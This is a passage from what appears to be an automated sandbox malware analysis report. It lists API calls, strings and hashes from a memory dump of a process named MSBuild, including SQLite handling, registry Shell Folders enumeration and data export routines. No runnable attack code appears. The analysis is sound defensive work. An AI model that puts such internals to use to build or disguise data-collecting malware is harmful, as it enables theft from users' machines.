                                                                                                                                                                                    • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6A4
                                                                                                                                                                                    • wcslen.MSVCRT ref: 0040A6B1
                                                                                                                                                                                    • wcscpy.MSVCRT ref: 0040A6C1
                                                                                                                                                                                    • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6CB
                                                                                                                                                                                    • wcscpy.MSVCRT ref: 0040A6DB
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                                                                                                                                                                    • String ID: Unknown Error$netmsg.dll
                                                                                                                                                                                    • API String ID: 2767993716-572158859
                                                                                                                                                                                    • Opcode ID: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                                                                                                                                                                    • Instruction ID: f30f617898fcbe25dfcd40b25f3134c3ee1324ef56ff669fd92f7ad18b117fee
                                                                                                                                                                                    • Opcode Fuzzy Hash: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                                                                                                                                                                    • Instruction Fuzzy Hash: 77014772104214BFE7151B61EC46E9F7B3DEF06795F24043AF902B10D0DA7A5E10D69D
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • database %s is already in use, xrefs: 0042F6C5
                                                                                                                                                                                    • database is already attached, xrefs: 0042F721
                                                                                                                                                                                    • cannot ATTACH database within transaction, xrefs: 0042F663
                                                                                                                                                                                    • unable to open database: %s, xrefs: 0042F84E
                                                                                                                                                                                    • too many attached databases - max %d, xrefs: 0042F64D
                                                                                                                                                                                    • attached databases must use the same text encoding as main database, xrefs: 0042F76F
                                                                                                                                                                                    • out of memory, xrefs: 0042F865
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcpymemset
                                                                                                                                                                                    • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                                                                                                                                                    • API String ID: 1297977491-2001300268
                                                                                                                                                                                    • Opcode ID: fafdf879e702536ae0a8da4e3c7de2ba30e48f0de6d41113ccb8534cd7e7e00e
                                                                                                                                                                                    • Instruction ID: 2d624c67d108d3170f37657fe85980b6deaf3b4166a4b31ce602698a835437d0
                                                                                                                                                                                    • Opcode Fuzzy Hash: fafdf879e702536ae0a8da4e3c7de2ba30e48f0de6d41113ccb8534cd7e7e00e
                                                                                                                                                                                    • Instruction Fuzzy Hash: 4791C131B00315AFDB10DF65E481B9ABBB0AF44318F94807FE8059B252D778E949CB59
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • DeleteFileW.KERNEL32(00000000,?,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 00418548
                                                                                                                                                                                    • GetFileAttributesW.KERNEL32(00000000), ref: 0041854F
                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0041855C
                                                                                                                                                                                    • Sleep.KERNEL32(00000064), ref: 00418571
                                                                                                                                                                                    • DeleteFileA.KERNEL32(00000000,?,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 0041857A
                                                                                                                                                                                    • GetFileAttributesA.KERNEL32(00000000), ref: 00418581
                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0041858E
                                                                                                                                                                                    • Sleep.KERNEL32(00000064), ref: 004185A3
                                                                                                                                                                                    • free.MSVCRT ref: 004185AC
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: File$AttributesDeleteErrorLastSleep$free
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2802642348-0
                                                                                                                                                                                    • Opcode ID: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                                                                                                                                                                    • Instruction ID: d61f765991b085217c17e58d7c3851c8d0f597f546fc635256e60a728691d00d
                                                                                                                                                                                    • Opcode Fuzzy Hash: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                                                                                                                                                                    • Instruction Fuzzy Hash: A011C639540624BBC61027716CC89BE3676E75B335B210A2EFA22912D0DF6C4CC2557E
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                                                                                                    • wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                                                      • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
                                                                                                                                                                                      • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
                                                                                                                                                                                    • wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                                                                                    • LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                                                                                    • memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                                                                                                                      • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,00402E6F), ref: 0040D0CC
                                                                                                                                                                                      • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,00402E6F), ref: 0040D0EA
                                                                                                                                                                                      • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D108
                                                                                                                                                                                      • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D126
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                                                                                                                                                                    • String ID: strings
                                                                                                                                                                                    • API String ID: 3166385802-3030018805
                                                                                                                                                                                    • Opcode ID: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                                                                                                                                                    • Instruction ID: f4589d763452722e7ce024d248fd6f149fceb83749f413ad0df853fa0cd60d20
                                                                                                                                                                                    • Opcode Fuzzy Hash: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                                                                                                                                                    • Instruction Fuzzy Hash: 78418D75D003109BD7369FA8ED809263365FF48306700047EE942972A7DEB9E886CB5D
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memcpy.MSVCRT(00000000,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B911
                                                                                                                                                                                    • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B923
                                                                                                                                                                                    • memcpy.MSVCRT(?,-journal,00000008,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B93B
                                                                                                                                                                                    • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B958
                                                                                                                                                                                    • memcpy.MSVCRT(?,-wal,00000004,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0041B970
                                                                                                                                                                                    • memset.MSVCRT ref: 0041BA3D
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcpy$memset
                                                                                                                                                                                    • String ID: -journal$-wal
                                                                                                                                                                                    • API String ID: 438689982-2894717839
                                                                                                                                                                                    • Opcode ID: dbb6fae49c61f74d6f433767b436fbd9ec9999f6e4b570cef93805d1319e1532
                                                                                                                                                                                    • Instruction ID: 9370885b9bf0560d7aa4477d28ce4586d78acc2621466e64c0ac2b95c9c5353a
                                                                                                                                                                                    • Opcode Fuzzy Hash: dbb6fae49c61f74d6f433767b436fbd9ec9999f6e4b570cef93805d1319e1532
                                                                                                                                                                                    • Instruction Fuzzy Hash: CBA1EFB1A04606EFCB14DF69C8417DAFBB4FF04314F14826EE46897381D738AA95CB99
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetSystemTime.KERNEL32(?), ref: 00418836
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000010), ref: 00418845
                                                                                                                                                                                    • GetCurrentProcessId.KERNEL32 ref: 00418856
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000004), ref: 00418869
                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 0041887D
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000004), ref: 00418890
                                                                                                                                                                                    • QueryPerformanceCounter.KERNEL32(?), ref: 004188A6
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000008), ref: 004188B6
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 4218492932-0
                                                                                                                                                                                    • Opcode ID: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                                                                                                                                                    • Instruction ID: a427a134a5f43ecd7f569dc5a6dbdc76404a49e7a1b6a3986382666b5299f542
                                                                                                                                                                                    • Opcode Fuzzy Hash: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                                                                                                                                                    • Instruction Fuzzy Hash: 141184B39001286BEB00AFA5DC899DEB7ACEB1A210F454837FA15D7144E634E2488795
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6EB
                                                                                                                                                                                      • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6FB
                                                                                                                                                                                      • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                                                                                                                                                      • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000040), ref: 0044A8BF
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000004,00000000), ref: 0044A90C
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000040), ref: 0044A988
                                                                                                                                                                                      • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000040,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A422
                                                                                                                                                                                      • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000008,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A46E
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000000), ref: 0044A9D8
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000020,?,?,?,?,00000000), ref: 0044AA19
                                                                                                                                                                                    • memcpy.MSVCRT(00000000,?,00000020,?,?,?,?,?,?,?,00000000), ref: 0044AA4A
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcpy$memset
                                                                                                                                                                                    • String ID: gj
                                                                                                                                                                                    • API String ID: 438689982-4203073231
                                                                                                                                                                                    • Opcode ID: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                                                                                                                                    • Instruction ID: 6893d0ddfb5a5ce8f484e87047b84ef7868cce638272d7e844f470f6f9013d76
                                                                                                                                                                                    • Opcode Fuzzy Hash: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                                                                                                                                    • Instruction Fuzzy Hash: 2E71D6F39083449BE310EF25D84059FB7E9ABD5348F050E2EF88997205E639DA19C797
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ItemMenu$CountInfomemsetwcschr
                                                                                                                                                                                    • String ID: 0$6
                                                                                                                                                                                    • API String ID: 2029023288-3849865405
                                                                                                                                                                                    • Opcode ID: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                                                                                                                                                                                    • Instruction ID: 35075b9e4b0179943f9cc9fcb0392e174ec026107191ec1d659f896637aaeb19
                                                                                                                                                                                    • Opcode Fuzzy Hash: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                                                                                                                                                                                    • Instruction Fuzzy Hash: A321AB32905300ABD720AF91DC8599FB7B8FB85754F000A3FF954A2280E779D944CB9A
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
                                                                                                                                                                                    • memset.MSVCRT ref: 00405455
                                                                                                                                                                                    • memset.MSVCRT ref: 0040546C
                                                                                                                                                                                    • memset.MSVCRT ref: 00405483
                                                                                                                                                                                    • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00405498
                                                                                                                                                                                    • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004054AD
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memset$memcpy$ErrorLast
                                                                                                                                                                                    • String ID: 6$\
                                                                                                                                                                                    • API String ID: 404372293-1284684873
                                                                                                                                                                                    • Opcode ID: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                                                                                                                                                                    • Instruction ID: af38dfd20ac5a94c77b7ead9800c7a3089711b207e9f3183cf3669ed78e53beb
                                                                                                                                                                                    • Opcode Fuzzy Hash: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                                                                                                                                                                    • Instruction Fuzzy Hash: 572141B280112CBBDF11AF99DC45EDF7BACDF15304F0080A6B509E2156E6398B988F65
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
                                                                                                                                                                                    • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
                                                                                                                                                                                    • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
                                                                                                                                                                                    • wcscpy.MSVCRT ref: 0040A0D9
                                                                                                                                                                                    • wcscat.MSVCRT ref: 0040A0E6
                                                                                                                                                                                    • wcscat.MSVCRT ref: 0040A0F5
                                                                                                                                                                                    • wcscpy.MSVCRT ref: 0040A107
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1331804452-0
                                                                                                                                                                                    • Opcode ID: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                                                                                                                                                    • Instruction ID: 70f18838178cd2dbc623065d80ced1a8b0c5b1489d8a310e1ceaee9f81d034e1
                                                                                                                                                                                    • Opcode Fuzzy Hash: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                                                                                                                                                    • Instruction Fuzzy Hash: 321191B284011DBFEB10AF95DC45DEF777CEB01745F104076B904B6091E6399E858B7A
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 0040440C: FreeLibrary.KERNEL32(?,0040436D,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404414
                                                                                                                                                                                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                                                                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                                                                                                                                    • String ID: advapi32.dll
                                                                                                                                                                                    • API String ID: 2012295524-4050573280
                                                                                                                                                                                    • Opcode ID: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                                                                                                                                                                                    • Instruction ID: 6b6c0a27b71384d3bff991c3c7ca7c9b0301c8735f49a3ee57333cb8f9a5f734
                                                                                                                                                                                    • Opcode Fuzzy Hash: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                                                                                                                                                                                    • Instruction Fuzzy Hash: 5F119470440700DDE6307F62EC0AF2777A4DF80714F104A3FE541565E1DBB8A8519AAD
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
                                                                                                                                                                                    • <?xml version="1.0" ?>, xrefs: 0041007C
                                                                                                                                                                                    • <%s>, xrefs: 004100A6
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memset$_snwprintf
                                                                                                                                                                                    • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                                                                                                                                    • API String ID: 3473751417-2880344631
                                                                                                                                                                                    • Opcode ID: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                                                                                                                                                    • Instruction ID: 2862698e7f89dc449948c814091faf4507903f68b21858a7dbdf66e33a92e1a6
                                                                                                                                                                                    • Opcode Fuzzy Hash: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                                                                                                                                                    • Instruction Fuzzy Hash: F501C8F2E402197BD720AA559C41FEAB6ACEF48345F0040B7B608B3151D6389F494B99
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: wcscat$_snwprintfmemset
                                                                                                                                                                                    • String ID: %2.2X
                                                                                                                                                                                    • API String ID: 2521778956-791839006
                                                                                                                                                                                    • Opcode ID: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                                                                                                                                                    • Instruction ID: 672bbb69153a15f1984629f72f86def8939f314c78adde6f8276b735d3b02408
                                                                                                                                                                                    • Opcode Fuzzy Hash: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                                                                                                                                                    • Instruction Fuzzy Hash: 2101D472A403297AF7206756AC46BBA33ACAB41714F11407BFC14AA1C2EA7C9A54469A
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _snwprintfwcscpy
                                                                                                                                                                                    • String ID: dialog_%d$general$menu_%d$strings
                                                                                                                                                                                    • API String ID: 999028693-502967061
                                                                                                                                                                                    • Opcode ID: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                                                                                                                                                                    • Instruction ID: 4b5f4d23dee208ad245a1fa3262b8d520e9fbefe09054bf07968a47f6ed58b46
                                                                                                                                                                                    • Opcode Fuzzy Hash: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                                                                                                                                                                    • Instruction Fuzzy Hash: 1AE04FB5E8870035E92519A10C03B2A155086A6B5BF740C2BFD0AB11D2E47F955DA40F
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                                                                                                                                      • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                                                                                                                                      • Part of subcall function 00414592: RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                                                                                                                                      • Part of subcall function 0040A9CE: free.MSVCRT ref: 0040A9DD
                                                                                                                                                                                    • memset.MSVCRT ref: 0040C439
                                                                                                                                                                                    • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                                                                                                                    • _wcsupr.MSVCRT ref: 0040C481
                                                                                                                                                                                      • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                                                                      • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                                                                                                      • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                                                                                                      • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                                                                                                                    • memset.MSVCRT ref: 0040C4D0
                                                                                                                                                                                    • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,?), ref: 0040C508
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: free$EnumValuememset$CloseOpen_wcsuprmemcpywcslen
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 4131475296-0
                                                                                                                                                                                    • Opcode ID: eb77d7cad75ccead34f911285e165139a1ce78e2e313fb24f2a05cc2c8735199
                                                                                                                                                                                    • Instruction ID: d2440758a7fd93b52fc88bd6111275bc9aa4df1ffeb01c53d5483546710cd2f3
                                                                                                                                                                                    • Opcode Fuzzy Hash: eb77d7cad75ccead34f911285e165139a1ce78e2e313fb24f2a05cc2c8735199
                                                                                                                                                                                    • Instruction Fuzzy Hash: A4411CB2900219BBDB00EF95DC85EEFB7BCAF48304F10417AB505F6191D7749A44CBA5
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 004116FF
                                                                                                                                                                                      • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                                                                                                      • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                                                                                      • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                                                                                                                      • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                                                      • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                                                      • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                                                                                      • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                                                                                                                                      • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                                                                                                      • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                                                                                                                                      • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                                                                                                                      • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                                                                                                                                      • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                                                                                                                      • Part of subcall function 0040A279: wcscpy.MSVCRT ref: 0040A2DF
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                                                                                                                                    • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                                                                                                                                    • API String ID: 2618321458-3614832568
